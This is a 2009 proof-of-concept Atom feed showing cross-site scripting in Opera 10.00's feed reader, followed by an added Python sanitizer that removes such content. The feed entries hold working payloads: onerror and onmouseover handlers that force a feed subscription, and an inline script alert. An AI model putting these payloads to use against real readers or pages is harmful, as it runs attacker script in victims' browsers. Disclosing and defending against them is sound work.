Nicolas Kerschenbaum

Nov 6th, 2009
<?xml version="1.0" encoding="utf-8"?>
<!-- Proof of concept: an Atom feed whose entries carry active content (event-handler
     attributes and an inline script) inside type="xhtml" content. When Opera 10.00's
     built-in feed reader renders the entries, the handlers run in the reader and call
     opera.feeds.subscribeNative(location.href), injecting the feed into the aggregator. -->
<feed
 xmlns="http://www.w3.org/2005/Atom"
 xml:base="http://labs:8888/RSS/rss.atom">
  <id>http://labs:8888/RSS/rss.atom</id>
  <title>XSS within RSS feeds on Opera 10.00</title>
  <updated>2009-09-09T00:00:00Z</updated>
  <link href="" />
  <link rel="self" href="" />
  <author><name>Nicolas Kerschenbaum</name></author>
  <contributor>
    <name>Security-Wave</name>
    <div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
      This exploit will inject this feed in Opera's inbuilt feed aggregator
    </div>
  </contributor>

  <!-- Payload 1: onerror handler on an <img> whose src is not an image, so the
       load fails and the handler fires without any user interaction. -->
  <entry>
    <title>Malicious RSS feed 1</title>
    <id>http://labs:8888/RSS/rss.atom#1</id>
    <link href="http://labs:8888/RSS/rss.atom#1"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><img src="http://google.com" onerror="opera.feeds.subscribeNative(location.href)"></img>
    </div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>

  <!-- Payload 2: onmouseover handler on a <p>, fires when the entry text is hovered. -->
  <entry>
    <title>Malicious RSS feed 2</title>
    <id>http://labs:8888/RSS/rss.atom#2</id>
    <link href="http://labs:8888/RSS/rss.atom#2"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><p onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</p>
    </div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>

  <!-- Payload 3: onmouseover handler on an <a>, same trigger as payload 2. -->
  <entry>
    <title>Malicious RSS feed 3</title>
    <id>http://labs:8888/RSS/rss.atom#3</id>
    <link href="http://labs:8888/RSS/rss.atom#3"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><a href="http://google.com" onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</a>
    </div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>

  <!-- Payload 4: inline <script> element, runs as soon as the entry is rendered. -->
  <entry>
    <title>JavaScript alert window</title>
    <id>http://labs:8888/RSS/rss.atom#4</id>
    <link href="http://labs:8888/RSS/rss.atom#4"/>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS by Security-Wave');</script></div></content>
    <updated>2009-09-09T00:00:00Z</updated>
  </entry>
</feed>
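The feed above shows the reader-side failure: an aggregator that renders type="xhtml" content as-is executes whatever event handlers and scripts the feed carries. What follows is an added example, not code from the paste, from Security-Wave or from Opera, of the allow-list sanitization a feed reader should apply before rendering entry content. It parses a constructed copy of the four payloads above, plus a fifth javascript: link that the paste does not include (added to show the URL-scheme check), drops on* attributes, forbidden elements and unsafe URL schemes, and reports what it removed. All function and constant names are hypothetical.

```python
"""Allow-list sanitizer for Atom <content type="xhtml"> payloads.

Added example (not part of the original paste). The sample feed below is a
constructed copy of the paste's payloads; all names here are hypothetical.
"""
import re
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
XHTML = "http://www.w3.org/1999/xhtml"
ET.register_namespace("", XHTML)  # serialize the cleaned <div> with a default namespace

# Elements a reader must never render from untrusted feed content.
FORBIDDEN_ELEMENTS = {"script", "style", "iframe", "object", "embed", "form", "meta", "link", "base"}
# Attributes that carry a URL and therefore need a scheme check.
URL_ATTRIBUTES = {"href", "src", "action", "formaction", "data", "poster"}
SAFE_SCHEMES = {"http", "https", "mailto"}
_CONTROL_OR_SPACE = re.compile(r"[\s\x00-\x1f]+")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")


def _local(qname):
    """'{uri}name' -> 'name'; plain names pass through."""
    return qname.rsplit("}", 1)[-1]


def _unsafe_url(value):
    """True for javascript:, data:, vbscript: and any other scheme outside the allow-list."""
    v = _CONTROL_OR_SPACE.sub("", value).lower()  # defeats 'java\nscript:' style splitting
    m = _SCHEME.match(v)
    if not m:
        return False  # relative reference: nothing to check
    return m.group(1) not in SAFE_SCHEMES


def sanitize_element(elem, findings):
    """Return a cleaned copy of elem, or None if the element itself is forbidden."""
    name = _local(elem.tag).lower()
    if name in FORBIDDEN_ELEMENTS:
        findings.append(f"removed <{name}> element")
        return None
    clean = ET.Element(elem.tag)
    for attr, value in elem.attrib.items():
        a = _local(attr).lower()
        if a.startswith("on"):  # onerror, onmouseover, ...
            findings.append(f"dropped {name}@{a}")
        elif a in URL_ATTRIBUTES and _unsafe_url(value):
            findings.append(f"dropped {name}@{a} ({value!r})")
        else:
            clean.set(attr, value)
    clean.text = elem.text
    clean.tail = elem.tail
    for child in elem:
        cleaned = sanitize_element(child, findings)
        if cleaned is not None:
            clean.append(cleaned)
        elif child.tail:  # keep the text that followed a removed element
            if len(clean):
                clean[-1].tail = (clean[-1].tail or "") + child.tail
            else:
                clean.text = (clean.text or "") + child.tail
    return clean


def sanitize_feed(feed_xml):
    """Parse an Atom feed and sanitize each entry's xhtml content.

    Returns one dict per entry: title, list of findings, cleaned markup.
    """
    results = []
    for entry in ET.fromstring(feed_xml).iter(ATOM + "entry"):
        findings, html = [], ""
        content = entry.find(ATOM + "content")
        if content is not None and content.get("type") == "xhtml":
            div = content.find("{%s}div" % XHTML)
            if div is not None:
                clean = sanitize_element(div, findings)
                clean.tail = None
                html = ET.tostring(clean, encoding="unicode")
        results.append({"title": entry.findtext(ATOM + "title", default=""),
                        "findings": findings, "html": html})
    return results


# Constructed sample: the paste's four payloads plus a javascript: link.
SAMPLE_FEED = """<feed xmlns="http://www.w3.org/2005/Atom">
  <id>http://labs:8888/RSS/rss.atom</id>
  <title>XSS within RSS feeds on Opera 10.00</title>
  <updated>2009-09-09T00:00:00Z</updated>
  <entry><title>Malicious RSS feed 1</title><id>http://labs:8888/RSS/rss.atom#1</id>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml"><img src="http://google.com" onerror="opera.feeds.subscribeNative(location.href)"></img></div></content></entry>
  <entry><title>Malicious RSS feed 2</title><id>http://labs:8888/RSS/rss.atom#2</id>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml"><p onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</p></div></content></entry>
  <entry><title>Malicious RSS feed 3</title><id>http://labs:8888/RSS/rss.atom#3</id>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml"><a href="http://google.com" onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</a></div></content></entry>
  <entry><title>JavaScript alert window</title><id>http://labs:8888/RSS/rss.atom#4</id>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml"><script>window.alert('XSS by Security-Wave');</script></div></content></entry>
  <entry><title>javascript: link (not in the paste)</title><id>http://labs:8888/RSS/rss.atom#5</id>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml"><a href="javascript:opera.feeds.subscribeNative(location.href)">click</a></div></content></entry>
</feed>"""

if __name__ == "__main__":
    for r in sanitize_feed(SAMPLE_FEED):
        print(r["title"], r["findings"], r["html"], sep="\n  ")
```

The sanitizer works on the parsed tree rather than on the serialized string, so attribute-name case, namespace prefixes and whitespace inside a scheme cannot hide a handler from it; anything not explicitly allowed is dropped and logged, which is what the reader should do before handing entry content to its HTML renderer.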